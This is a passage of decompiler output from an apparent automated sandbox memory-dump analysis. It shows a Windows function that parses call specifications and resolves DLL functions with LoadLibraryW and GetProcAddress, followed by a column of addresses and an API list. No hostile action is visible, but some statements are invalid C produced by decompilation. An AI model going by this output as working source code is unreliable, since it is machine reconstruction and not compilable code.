                                                  											__eflags = __ebx - 0xb;
                                                  											if(__ebx < 0xb) {
                                                  												__ebx = __ebx + 0xa;
                                                  											}
                                                  											goto L97;
                                                  										case 0x14:
                                                  											__ebx = 0xffffffff;
                                                  											goto L98;
                                                  										case 0x15:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L116;
                                                  										case 0x16:
                                                  											__ecx = 0;
                                                  											__eflags = 0;
                                                  											goto L91;
                                                  										case 0x17:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L120;
                                                  										case 0x18:
                                                  											_t271 =  *(_t332 + 0x1014);
                                                  											__eflags = _t271 - _v16;
                                                  											if(_t271 > _v16) {
                                                  												_v16 = _t271;
                                                  											}
                                                  											_v8 = _v8 & 0x00000000;
                                                  											_v20 = _v20 & 0x00000000;
                                                  											_v36 - 3 = _t271 - (_v36 == 3);
                                                  											if(_t271 != _v36 == 3) {
                                                  												L85:
                                                  												_v40 = 1;
                                                  											}
                                                  											goto L57;
                                                  										case 0x19:
                                                  											L107:
                                                  											__ecx = 0;
                                                  											_v8 = 2;
                                                  											__ecx = 1;
                                                  											goto L91;
                                                  										case 0x1a:
                                                  											L118:
                                                  											_push(5);
                                                  											goto L123;
                                                  										case 0x1b:
                                                  											L109:
                                                  											__ecx = 0;
                                                  											_v8 = 3;
                                                  											__ecx = 1;
                                                  											goto L91;
                                                  										case 0x1c:
                                                  											L111:
                                                  											__ecx = 0;
                                                  											__ecx = 1;
                                                  											goto L91;
                                                  										case 0x1d:
                                                  											L122:
                                                  											_push(6);
                                                  											goto L123;
                                                  										case 0x1e:
                                                  											L113:
                                                  											_push(2);
                                                  											goto L123;
                                                  										case 0x1f:
                                                  											__eax =  &_v12;
                                                  											__eax = E73201B86( &_v12);
                                                  											__ebx = __eax;
                                                  											__ebx = __eax + 1;
                                                  											goto L97;
                                                  										case 0x20:
                                                  											L116:
                                                  											_v52 = _v52 + 1;
                                                  											_push(4);
                                                  											_pop(__ecx);
                                                  											goto L91;
                                                  										case 0x21:
                                                  											L120:
                                                  											_push(4);
                                                  											L123:
                                                  											_pop(__ecx);
                                                  											L91:
                                                  											__edi = _v16;
                                                  											__edx =  *(0x7320405c + __ecx * 4);
                                                  											__eax =  ~__eax;
                                                  											asm("sbb eax, eax");
                                                  											_v40 = 1;
                                                  											__edi = _v16 << 5;
                                                  											__eax = __eax & 0x00008000;
                                                  											__edi = (_v16 << 5) + __esi;
                                                  											__eax = __eax | __ecx;
                                                  											__eflags = _v8;
                                                  											 *(__edi + 0x1018) = __eax;
                                                  											if(_v8 < 0) {
                                                  												L93:
                                                  												__edx = 0;
                                                  												__edx = 1;
                                                  												__eflags = 1;
                                                  												L94:
                                                  												__eflags = _v8 - 1;
                                                  												 *(__edi + 0x1028) = __edx;
                                                  												if(_v8 == 1) {
                                                  													__eax =  &_v12;
                                                  													__eax = E73201B86( &_v12);
                                                  													__eax = __eax + 1;
                                                  													__eflags = __eax;
                                                  													_v8 = __eax;
                                                  												}
                                                  												__eax = _v8;
                                                  												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                  												_t136 = _v16 + 0x81; // 0x81
                                                  												_t136 = _t136 << 5;
                                                  												__eax = 0;
                                                  												__eflags = 0;
                                                  												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                  												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                  												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                  												L97:
                                                  												__eflags = __ebx;
                                                  												if(__ebx == 0) {
                                                  													goto L57;
                                                  												}
                                                  												L98:
                                                  												__eflags = _v20;
                                                  												_v40 = 1;
                                                  												if(_v20 != 0) {
                                                  													L103:
                                                  													__eflags = _v20 - 1;
                                                  													if(_v20 == 1) {
                                                  														__eax = _v16;
                                                  														__eax = _v16 << 5;
                                                  														__eflags = __eax;
                                                  														 *(__eax + __esi + 0x102c) = __ebx;
                                                  													}
                                                  													goto L105;
                                                  												}
                                                  												_v16 = _v16 << 5;
                                                  												_t144 = __esi + 0x1030; // 0x1030
                                                  												__edi = (_v16 << 5) + _t144;
                                                  												__eax =  *__edi;
                                                  												__eflags = __eax - 0xffffffff;
                                                  												if(__eax <= 0xffffffff) {
                                                  													L101:
                                                  													__eax = GlobalFree(__eax);
                                                  													L102:
                                                  													 *__edi = __ebx;
                                                  													goto L103;
                                                  												}
                                                  												__eflags = __eax - 0x19;
                                                  												if(__eax <= 0x19) {
                                                  													goto L102;
                                                  												}
                                                  												goto L101;
                                                  											}
                                                  											__eflags = __edx;
                                                  											if(__edx > 0) {
                                                  												goto L94;
                                                  											}
                                                  											goto L93;
                                                  										case 0x22:
                                                  											goto L57;
                                                  									}
                                                  								}
                                                  								_t272 = _t269 - 1;
                                                  								__eflags = _t272;
                                                  								if(_t272 == 0) {
                                                  									_v16 = _t283;
                                                  									goto L80;
                                                  								}
                                                  								__eflags = _t272 != 1;
                                                  								if(_t272 != 1) {
                                                  									goto L162;
                                                  								}
                                                  								__eflags = _t286 - 0x6e;
                                                  								if(__eflags > 0) {
                                                  									_t309 = _t286 - 0x72;
                                                  									__eflags = _t309;
                                                  									if(_t309 == 0) {
                                                  										_push(4);
                                                  										L74:
                                                  										_pop(_t274);
                                                  										L75:
                                                  										__eflags = _v8 - 1;
                                                  										if(_v8 != 1) {
                                                  											_t96 = _t332 + 0x1010;
                                                  											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                  											__eflags =  *_t96;
                                                  										} else {
                                                  											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                  										}
                                                  										_v8 = 1;
                                                  										goto L57;
                                                  									}
                                                  									_t312 = _t309 - 1;
                                                  									__eflags = _t312;
                                                  									if(_t312 == 0) {
                                                  										_push(0x10);
                                                  										goto L74;
                                                  									}
                                                  									__eflags = _t312 != 0;
                                                  									if(_t312 != 0) {
                                                  										goto L57;
                                                  									}
                                                  									_push(0x40);
                                                  									goto L74;
                                                  								}
                                                  								if(__eflags == 0) {
                                                  									_push(8);
                                                  									goto L74;
                                                  								}
                                                  								_t315 = _t286 - 0x21;
                                                  								__eflags = _t315;
                                                  								if(_t315 == 0) {
                                                  									_v8 =  ~_v8;
                                                  									goto L57;
                                                  								}
                                                  								_t316 = _t315 - 0x11;
                                                  								__eflags = _t316;
                                                  								if(_t316 == 0) {
                                                  									_t274 = 0x100;
                                                  									goto L75;
                                                  								}
                                                  								_t317 = _t316 - 0x31;
                                                  								__eflags = _t317;
                                                  								if(_t317 == 0) {
                                                  									_t274 = 1;
                                                  									goto L75;
                                                  								}
                                                  								__eflags = _t317 != 0;
                                                  								if(_t317 != 0) {
                                                  									goto L57;
                                                  								}
                                                  								_push(0x20);
                                                  								goto L74;
                                                  							} else {
                                                  								_v32 = _t283;
                                                  								_v36 = _t283;
                                                  								goto L20;
                                                  							}
                                                  						}
                                                  						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                  						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                  							goto L17;
                                                  						}
                                                  						__eflags = _v32 - _t283;
                                                  						if(_v32 == _t283) {
                                                  							goto L43;
                                                  						}
                                                  						goto L17;
                                                  					}
                                                  					_t277 = _t258 - 5;
                                                  					if(_t277 == 0) {
                                                  						__eflags = _v44 - _t283;
                                                  						if(_v44 != _t283) {
                                                  							goto L43;
                                                  						} else {
                                                  							__eflags = _v36 - 3;
                                                  							_v32 = 1;
                                                  							_v8 = _t283;
                                                  							_v20 = _t283;
                                                  							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                  							_v40 = _t283;
                                                  							goto L20;
                                                  						}
                                                  					}
                                                  					_t281 = _t277 - 1;
                                                  					if(_t281 == 0) {
                                                  						__eflags = _v44 - _t283;
                                                  						if(_v44 != _t283) {
                                                  							goto L43;
                                                  						} else {
                                                  							_v32 = 2;
                                                  							_v8 = _t283;
                                                  							_v20 = _t283;
                                                  							goto L20;
                                                  						}
                                                  					}
                                                  					if(_t281 != 0x16) {
                                                  						goto L43;
                                                  					} else {
                                                  						_v32 = 3;
                                                  						_v8 = 1;
                                                  						goto L20;
                                                  					}
                                                  				}
                                                  				GlobalFree(_v56);
                                                  				GlobalFree(_v24);
                                                  				GlobalFree(_v48);
                                                  				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                  					L182:
                                                  					return _t332;
                                                  				} else {
                                                  					_t225 =  *_t332 - 1;
                                                  					if(_t225 == 0) {
                                                  						_t187 = _t332 + 8; // 0x8
                                                  						_t324 = _t187;
                                                  						__eflags =  *_t324 - _t283;
                                                  						if( *_t324 != _t283) {
                                                  							_t226 = GetModuleHandleW(_t324);
                                                  							__eflags = _t226 - _t283;
                                                  							 *(_t332 + 0x1008) = _t226;
                                                  							if(_t226 != _t283) {
                                                  								L171:
                                                  								_t192 = _t332 + 0x808; // 0x808
                                                  								_t325 = _t192;
                                                  								_t227 = E732016BD( *(_t332 + 0x1008), _t325);
                                                  								__eflags = _t227 - _t283;
                                                  								 *(_t332 + 0x100c) = _t227;
                                                  								if(_t227 == _t283) {
                                                  									__eflags =  *_t325 - 0x23;
                                                  									if( *_t325 == 0x23) {
                                                  										_t195 = _t332 + 0x80a; // 0x80a
                                                  										_t231 = E732013B1(_t195);
                                                  										__eflags = _t231 - _t283;
                                                  										if(_t231 != _t283) {
                                                  											__eflags = _t231 & 0xffff0000;
                                                  											if((_t231 & 0xffff0000) == 0) {
                                                  												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								__eflags = _v52 - _t283;
                                                  								if(_v52 != _t283) {
                                                  									L178:
                                                  									_t325[lstrlenW(_t325)] = 0x57;
                                                  									_t229 = E732016BD( *(_t332 + 0x1008), _t325);
                                                  									__eflags = _t229 - _t283;
                                                  									if(_t229 != _t283) {
                                                  										L166:
                                                  										 *(_t332 + 0x100c) = _t229;
                                                  										goto L182;
                                                  									}
                                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                                  									L180:
                                                  									if(__eflags != 0) {
                                                  										goto L182;
                                                  									}
                                                  									L181:
                                                  									_t206 = _t332 + 4;
                                                  									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                  									__eflags =  *_t206;
                                                  									goto L182;
                                                  								} else {
                                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                                  									if( *(_t332 + 0x100c) != _t283) {
                                                  										goto L182;
                                                  									}
                                                  									goto L178;
                                                  								}
                                                  							}
                                                  							_t234 = LoadLibraryW(_t324);
                                                  							__eflags = _t234 - _t283;
                                                  							 *(_t332 + 0x1008) = _t234;
                                                  							if(_t234 == _t283) {
                                                  								goto L181;
                                                  							}
                                                  							goto L171;
                                                  						}
                                                  						_t188 = _t332 + 0x808; // 0x808
                                                  						_t236 = E732013B1(_t188);
                                                  						 *(_t332 + 0x100c) = _t236;
                                                  						__eflags = _t236 - _t283;
                                                  						goto L180;
                                                  					}
                                                  					_t237 = _t225 - 1;
                                                  					if(_t237 == 0) {
                                                  						_t185 = _t332 + 0x808; // 0x808
                                                  						_t238 = _t185;
                                                  						__eflags =  *_t238 - _t283;
                                                  						if( *_t238 == _t283) {
                                                  							goto L182;
                                                  						}
                                                  						_t229 = E732013B1(_t238);
                                                  						L165:
                                                  						goto L166;
                                                  					}
                                                  					if(_t237 != 1) {
                                                  						goto L182;
                                                  					}
                                                  					_t81 = _t332 + 8; // 0x8
                                                  					_t284 = _t81;
                                                  					_t326 = E732013B1(_t81);
                                                  					 *(_t332 + 0x1008) = _t326;
                                                  					if(_t326 == 0) {
                                                  						goto L181;
                                                  					}
                                                  					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                  					 *((intOrPtr*)(_t332 + 0x1050)) = E732012CC(_t284);
                                                  					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                  					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                  					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                  					_t90 = _t332 + 0x808; // 0x808
                                                  					_t229 =  *(_t326->i + E732013B1(_t90) * 4);
                                                  					goto L165;
                                                  				}
                                                  			}

































































                                                  0x73201c07
                                                  0x73201c0a
                                                  0x73201c0d
                                                  0x73201c10
                                                  0x73201c13
                                                  0x73201c16
                                                  0x73201c19
                                                  0x73201c1b
                                                  0x73201c1e
                                                  0x73201c21
                                                  0x73201c26
                                                  0x73201c29
                                                  0x73201c31
                                                  0x73201c39
                                                  0x73201c3b
                                                  0x73201c3e
                                                  0x73201c46
                                                  0x73201c46
                                                  0x73201c4b
                                                  0x73201c4e
                                                  0x00000000
                                                  0x00000000
                                                  0x73201c5b
                                                  0x73201c60
                                                  0x73201c62
                                                  0x73201cf4
                                                  0x73201cf4
                                                  0x73201cf4
                                                  0x73201cf8
                                                  0x73201cfb
                                                  0x73201cfd
                                                  0x73201d1f
                                                  0x73201d21
                                                  0x73201d24
                                                  0x73201d33
                                                  0x73201d35
                                                  0x73201d3b
                                                  0x73201d3b
                                                  0x73201d41
                                                  0x73201d44
                                                  0x73201d44
                                                  0x73201d47
                                                  0x73201d47
                                                  0x73201d4d
                                                  0x73201d4f
                                                  0x73201d4f
                                                  0x73201d51
                                                  0x73201d54
                                                  0x73201d57
                                                  0x73201d5d
                                                  0x73201d63
                                                  0x73201d66
                                                  0x73201d8a
                                                  0x73201d8d
                                                  0x00000000
                                                  0x00000000
                                                  0x73201d90
                                                  0x73201d92
                                                  0x73201da0
                                                  0x73201da3
                                                  0x73201da5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201da7
                                                  0x73201da7
                                                  0x73201da7
                                                  0x73201dad
                                                  0x73201daf
                                                  0x00000000
                                                  0x00000000
                                                  0x73201db1
                                                  0x73201db3
                                                  0x73201db5
                                                  0x73201db7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201db7
                                                  0x73201db9
                                                  0x73201dbb
                                                  0x73201dbd
                                                  0x73201dbd
                                                  0x73201dc3
                                                  0x73201dc9
                                                  0x73201dcb
                                                  0x73201ddf
                                                  0x73201ddf
                                                  0x73201de1
                                                  0x73201dcd
                                                  0x73201dd3
                                                  0x73201dd6
                                                  0x73201dd6
                                                  0x00000000
                                                  0x73201d68
                                                  0x73201d68
                                                  0x73201d68
                                                  0x73201d69
                                                  0x73201d71
                                                  0x73201d75
                                                  0x73201d7b
                                                  0x73201d7f
                                                  0x00000000
                                                  0x73201d7f
                                                  0x73201d6b
                                                  0x73201d6b
                                                  0x73201d6c
                                                  0x00000000
                                                  0x00000000
                                                  0x73201d6e
                                                  0x73201d6f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201d6f
                                                  0x73201cff
                                                  0x73201d00
                                                  0x73201d09
                                                  0x73201d0c
                                                  0x73201d19
                                                  0x73201d19
                                                  0x73201d0e
                                                  0x73201d0e
                                                  0x73201de7
                                                  0x73201dea
                                                  0x73201dee
                                                  0x73201e61
                                                  0x73201e65
                                                  0x73201c43
                                                  0x00000000
                                                  0x73201c43
                                                  0x00000000
                                                  0x73201e65
                                                  0x73201cfd
                                                  0x73201c68
                                                  0x73201c6b
                                                  0x73201cce
                                                  0x73201cd1
                                                  0x73201ce3
                                                  0x73201ce3
                                                  0x73201ce6
                                                  0x73201df3
                                                  0x73201df6
                                                  0x73201df6
                                                  0x73201df8
                                                  0x732021ae
                                                  0x732021c6
                                                  0x732021c6
                                                  0x732021c9
                                                  0x00000000
                                                  0x00000000
                                                  0x732021b3
                                                  0x732021b4
                                                  0x732021b7
                                                  0x732021ba
                                                  0x73202244
                                                  0x7320224b
                                                  0x73202251
                                                  0x73202255
                                                  0x73201e5c
                                                  0x73201e5d
                                                  0x73201e5d
                                                  0x73201e5e
                                                  0x00000000
                                                  0x73201e5e
                                                  0x732021c0
                                                  0x732021c3
                                                  0x732021c3
                                                  0x732021cb
                                                  0x732021ce
                                                  0x73202238
                                                  0x73201e51
                                                  0x73201e54
                                                  0x73201e57
                                                  0x73201e5a
                                                  0x73201e5a
                                                  0x00000000
                                                  0x73201e5a
                                                  0x732021d0
                                                  0x732021d3
                                                  0x732021da
                                                  0x732021da
                                                  0x732021dd
                                                  0x732021e1
                                                  0x732021f5
                                                  0x732021f5
                                                  0x732021f8
                                                  0x732021fc
                                                  0x00000000
                                                  0x00000000
                                                  0x732021fe
                                                  0x73202202
                                                  0x00000000
                                                  0x00000000
                                                  0x73202204
                                                  0x7320220b
                                                  0x7320220b
                                                  0x73202211
                                                  0x73202214
                                                  0x73202230
                                                  0x73202216
                                                  0x7320221f
                                                  0x73202222
                                                  0x73202222
                                                  0x00000000
                                                  0x73202214
                                                  0x732021e3
                                                  0x732021e6
                                                  0x732021ea
                                                  0x00000000
                                                  0x00000000
                                                  0x732021ec
                                                  0x00000000
                                                  0x732021ec
                                                  0x732021d5
                                                  0x732021d8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x732021d8
                                                  0x73201dfe
                                                  0x73201dfe
                                                  0x73201dff
                                                  0x73201f49
                                                  0x73201f49
                                                  0x73201f50
                                                  0x73201f53
                                                  0x00000000
                                                  0x00000000
                                                  0x73201f60
                                                  0x00000000
                                                  0x7320214b
                                                  0x7320214e
                                                  0x73202151
                                                  0x73202151
                                                  0x73202152
                                                  0x73202153
                                                  0x73202156
                                                  0x73202159
                                                  0x7320215c
                                                  0x00000000
                                                  0x00000000
                                                  0x7320215e
                                                  0x7320215e
                                                  0x73202162
                                                  0x7320217a
                                                  0x7320217d
                                                  0x73202181
                                                  0x73202187
                                                  0x00000000
                                                  0x73202187
                                                  0x73202164
                                                  0x73202164
                                                  0x73202167
                                                  0x00000000
                                                  0x00000000
                                                  0x73202169
                                                  0x7320216c
                                                  0x7320216e
                                                  0x7320216f
                                                  0x7320216f
                                                  0x7320216f
                                                  0x73202170
                                                  0x73202173
                                                  0x73202176
                                                  0x73202177
                                                  0x73202151
                                                  0x73202152
                                                  0x73202153
                                                  0x73202156
                                                  0x73202159
                                                  0x7320215c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x7320215c
                                                  0x00000000
                                                  0x73201fa7
                                                  0x00000000
                                                  0x00000000
                                                  0x73201fb3
                                                  0x00000000
                                                  0x00000000
                                                  0x73201f9a
                                                  0x73201f9e
                                                  0x73201fa2
                                                  0x00000000
                                                  0x00000000
                                                  0x7320211c
                                                  0x73202120
                                                  0x00000000
                                                  0x00000000
                                                  0x73202126
                                                  0x7320212f
                                                  0x73202136
                                                  0x7320213e
                                                  0x00000000
                                                  0x00000000
                                                  0x73202083
                                                  0x73202083
                                                  0x00000000
                                                  0x00000000
                                                  0x73201fbc
                                                  0x00000000
                                                  0x00000000
                                                  0x732021a6
                                                  0x00000000
                                                  0x00000000
                                                  0x7320208b
                                                  0x7320208d
                                                  0x7320208d
                                                  0x00000000
                                                  0x00000000
                                                  0x73202196
                                                  0x00000000
                                                  0x00000000
                                                  0x7320219a
                                                  0x00000000
                                                  0x00000000
                                                  0x732021a2
                                                  0x00000000
                                                  0x00000000
                                                  0x732020d3
                                                  0x732020d5
                                                  0x732020d5
                                                  0x00000000
                                                  0x00000000
                                                  0x7320209d
                                                  0x7320209f
                                                  0x7320209f
                                                  0x00000000
                                                  0x00000000
                                                  0x732020af
                                                  0x732020b1
                                                  0x732020b1
                                                  0x00000000
                                                  0x00000000
                                                  0x732020e1
                                                  0x732020e3
                                                  0x732020e3
                                                  0x00000000
                                                  0x00000000
                                                  0x732020ba
                                                  0x732020bc
                                                  0x732020bc
                                                  0x00000000
                                                  0x00000000
                                                  0x732020c1
                                                  0x00000000
                                                  0x00000000
                                                  0x7320219e
                                                  0x732021a8
                                                  0x732021a8
                                                  0x00000000
                                                  0x00000000
                                                  0x732020ec
                                                  0x732020f0
                                                  0x732020f5
                                                  0x732020f8
                                                  0x732020f9
                                                  0x732020fc
                                                  0x73202102
                                                  0x73202102
                                                  0x00000000
                                                  0x00000000
                                                  0x7320218e
                                                  0x00000000
                                                  0x00000000
                                                  0x732020c5
                                                  0x732020c7
                                                  0x732020c7
                                                  0x00000000
                                                  0x00000000
                                                  0x73201fc3
                                                  0x73201fc3
                                                  0x00000000
                                                  0x00000000
                                                  0x732020da
                                                  0x732020dc
                                                  0x732020dc
                                                  0x00000000
                                                  0x00000000
                                                  0x73201f67
                                                  0x73201f6d
                                                  0x73201f70
                                                  0x73201f72
                                                  0x73201f72
                                                  0x73201f75
                                                  0x73201f79
                                                  0x73201f86
                                                  0x73201f88
                                                  0x73201f8e
                                                  0x73201f8e
                                                  0x73201f8e
                                                  0x00000000
                                                  0x00000000
                                                  0x7320208e
                                                  0x7320208e
                                                  0x73202090
                                                  0x73202097
                                                  0x00000000
                                                  0x00000000
                                                  0x732020d6
                                                  0x732020d6
                                                  0x00000000
                                                  0x00000000
                                                  0x732020a0
                                                  0x732020a0
                                                  0x732020a2
                                                  0x732020a9
                                                  0x00000000
                                                  0x00000000
                                                  0x732020b2
                                                  0x732020b2
                                                  0x732020b4
                                                  0x00000000
                                                  0x00000000
                                                  0x732020e4
                                                  0x732020e4
                                                  0x00000000
                                                  0x00000000
                                                  0x732020bd
                                                  0x732020bd
                                                  0x00000000
                                                  0x00000000
                                                  0x7320210a
                                                  0x7320210e
                                                  0x73202113
                                                  0x73202116
                                                  0x00000000
                                                  0x00000000
                                                  0x732020c8
                                                  0x732020c8
                                                  0x732020cb
                                                  0x732020cd
                                                  0x00000000
                                                  0x00000000
                                                  0x732020dd
                                                  0x732020dd
                                                  0x732020e6
                                                  0x732020e6
                                                  0x73201fc5
                                                  0x73201fc5
                                                  0x73201fc8
                                                  0x73201fcf
                                                  0x73201fd1
                                                  0x73201fd3
                                                  0x73201fda
                                                  0x73201fdd
                                                  0x73201fe2
                                                  0x73201fe4
                                                  0x73201fe6
                                                  0x73201fea
                                                  0x73201ff0
                                                  0x73201ff6
                                                  0x73201ff6
                                                  0x73201ff8
                                                  0x73201ff8
                                                  0x73201ff9
                                                  0x73201ff9
                                                  0x73201ffd
                                                  0x73202003
                                                  0x73202005
                                                  0x73202009
                                                  0x7320200e
                                                  0x7320200e
                                                  0x73202010
                                                  0x73202010
                                                  0x73202013
                                                  0x73202016
                                                  0x7320201f
                                                  0x73202025
                                                  0x73202028
                                                  0x73202028
                                                  0x7320202a
                                                  0x7320202d
                                                  0x73202033
                                                  0x73202039
                                                  0x73202039
                                                  0x7320203b
                                                  0x00000000
                                                  0x00000000
                                                  0x73202041
                                                  0x73202041
                                                  0x73202045
                                                  0x7320204c
                                                  0x73202070
                                                  0x73202070
                                                  0x73202074
                                                  0x73202076
                                                  0x73202079
                                                  0x73202079
                                                  0x7320207c
                                                  0x7320207c
                                                  0x00000000
                                                  0x73202074
                                                  0x73202051
                                                  0x73202054
                                                  0x73202054
                                                  0x7320205b
                                                  0x7320205d
                                                  0x73202060
                                                  0x73202067
                                                  0x73202068
                                                  0x7320206e
                                                  0x7320206e
                                                  0x00000000
                                                  0x7320206e
                                                  0x73202062
                                                  0x73202065
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73202065
                                                  0x73201ff2
                                                  0x73201ff4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201f60
                                                  0x73201e05
                                                  0x73201e05
                                                  0x73201e06
                                                  0x73201f46
                                                  0x00000000
                                                  0x73201f46
                                                  0x73201e0c
                                                  0x73201e0d
                                                  0x00000000
                                                  0x00000000
                                                  0x73201e13
                                                  0x73201e16
                                                  0x73201f0b
                                                  0x73201f0b
                                                  0x73201f0e
                                                  0x73201f23
                                                  0x73201f25
                                                  0x73201f25
                                                  0x73201f26
                                                  0x73201f29
                                                  0x73201f2c
                                                  0x73201f38
                                                  0x73201f38
                                                  0x73201f38
                                                  0x73201f2e
                                                  0x73201f2e
                                                  0x73201f2e
                                                  0x73201f3e
                                                  0x00000000
                                                  0x73201f3e
                                                  0x73201f10
                                                  0x73201f10
                                                  0x73201f11
                                                  0x73201f1f
                                                  0x00000000
                                                  0x73201f1f
                                                  0x73201f14
                                                  0x73201f15
                                                  0x00000000
                                                  0x00000000
                                                  0x73201f1b
                                                  0x00000000
                                                  0x73201f1b
                                                  0x73201e1c
                                                  0x73201f07
                                                  0x00000000
                                                  0x73201f07
                                                  0x73201e22
                                                  0x73201e22
                                                  0x73201e25
                                                  0x73201e4e
                                                  0x00000000
                                                  0x73201e4e
                                                  0x73201e27
                                                  0x73201e27
                                                  0x73201e2a
                                                  0x73201e44
                                                  0x00000000
                                                  0x73201e44
                                                  0x73201e2c
                                                  0x73201e2c
                                                  0x73201e2f
                                                  0x73201e3e
                                                  0x00000000
                                                  0x73201e3e
                                                  0x73201e32
                                                  0x73201e33
                                                  0x00000000
                                                  0x00000000
                                                  0x73201e35
                                                  0x00000000
                                                  0x73201cec
                                                  0x73201cec
                                                  0x73201cef
                                                  0x00000000
                                                  0x73201cef
                                                  0x73201ce6
                                                  0x73201cd3
                                                  0x73201cd8
                                                  0x00000000
                                                  0x00000000
                                                  0x73201cda
                                                  0x73201cdd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201cdd
                                                  0x73201c6d
                                                  0x73201c70
                                                  0x73201ca6
                                                  0x73201ca9
                                                  0x00000000
                                                  0x73201caf
                                                  0x73201cb1
                                                  0x73201cb5
                                                  0x73201cbc
                                                  0x73201cc3
                                                  0x73201cc6
                                                  0x73201cc9
                                                  0x00000000
                                                  0x73201cc9
                                                  0x73201ca9
                                                  0x73201c72
                                                  0x73201c73
                                                  0x73201c8e
                                                  0x73201c91
                                                  0x00000000
                                                  0x73201c97
                                                  0x73201c97
                                                  0x73201c9e
                                                  0x73201ca1
                                                  0x00000000
                                                  0x73201ca1
                                                  0x73201c91
                                                  0x73201c78
                                                  0x00000000
                                                  0x73201c7e
                                                  0x73201c7e
                                                  0x73201c85
                                                  0x00000000
                                                  0x73201c85
                                                  0x73201c78
                                                  0x73201e74
                                                  0x73201e79
                                                  0x73201e7e
                                                  0x73201e82
                                                  0x73202355
                                                  0x7320235b
                                                  0x73201e94
                                                  0x73201e96
                                                  0x73201e97
                                                  0x7320227e
                                                  0x7320227e
                                                  0x73202281
                                                  0x73202284
                                                  0x732022a1
                                                  0x732022a7
                                                  0x732022a9
                                                  0x732022af
                                                  0x732022c6
                                                  0x732022c6
                                                  0x732022c6
                                                  0x732022d3
                                                  0x732022d9
                                                  0x732022dc
                                                  0x732022e2
                                                  0x732022e4
                                                  0x732022e8
                                                  0x732022ea
                                                  0x732022f1
                                                  0x732022f6
                                                  0x732022f9
                                                  0x732022fb
                                                  0x73202300
                                                  0x73202312
                                                  0x73202312
                                                  0x73202300
                                                  0x732022f9
                                                  0x732022e8
                                                  0x73202318
                                                  0x7320231b
                                                  0x73202325
                                                  0x7320232d
                                                  0x7320233a
                                                  0x73202340
                                                  0x73202343
                                                  0x73202273
                                                  0x73202273
                                                  0x00000000
                                                  0x73202273
                                                  0x73202349
                                                  0x7320234f
                                                  0x7320234f
                                                  0x00000000
                                                  0x00000000
                                                  0x73202351
                                                  0x73202351
                                                  0x73202351
                                                  0x73202351
                                                  0x00000000
                                                  0x7320231d
                                                  0x7320231d
                                                  0x73202323
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73202323
                                                  0x7320231b
                                                  0x732022b2
                                                  0x732022b8
                                                  0x732022ba
                                                  0x732022c0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x732022c0
                                                  0x73202286
                                                  0x7320228d
                                                  0x73202293
                                                  0x73202299
                                                  0x00000000
                                                  0x73202299
                                                  0x73201e9d
                                                  0x73201e9e
                                                  0x7320225d
                                                  0x7320225d
                                                  0x73202263
                                                  0x73202266
                                                  0x00000000
                                                  0x00000000
                                                  0x7320226d
                                                  0x73202272
                                                  0x00000000
                                                  0x73202272
                                                  0x73201ea5
                                                  0x00000000
                                                  0x00000000
                                                  0x73201eab
                                                  0x73201eab
                                                  0x73201eb4
                                                  0x73201eb9
                                                  0x73201ebf
                                                  0x00000000
                                                  0x00000000
                                                  0x73201ec5
                                                  0x73201ed2
                                                  0x73201ed8
                                                  0x73201ee2
                                                  0x73201ee8
                                                  0x73201ef0
                                                  0x73201f00
                                                  0x00000000
                                                  0x73201f00

                                                  APIs
                                                    • Part of subcall function 732012BB: GlobalAlloc.KERNELBASE(00000040,?,732012DB,?,7320137F,00000019,732011CA,-000000A0), ref: 732012C5
                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73201D2D
                                                  • lstrcpyW.KERNEL32 ref: 73201D75
                                                  • lstrcpyW.KERNEL32 ref: 73201D7F
                                                  • GlobalFree.KERNEL32 ref: 73201D92
                                                  • GlobalFree.KERNEL32 ref: 73201E74
                                                  • GlobalFree.KERNEL32 ref: 73201E79
                                                  • GlobalFree.KERNEL32 ref: 73201E7E
                                                  • GlobalFree.KERNEL32 ref: 73202068
                                                  • lstrcpyW.KERNEL32 ref: 73202222
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 732022A1
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 732022B2
                                                  • GetProcAddress.KERNEL32(?,?), ref: 7320230C
                                                  • lstrlenW.KERNEL32(00000808), ref: 73202326
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
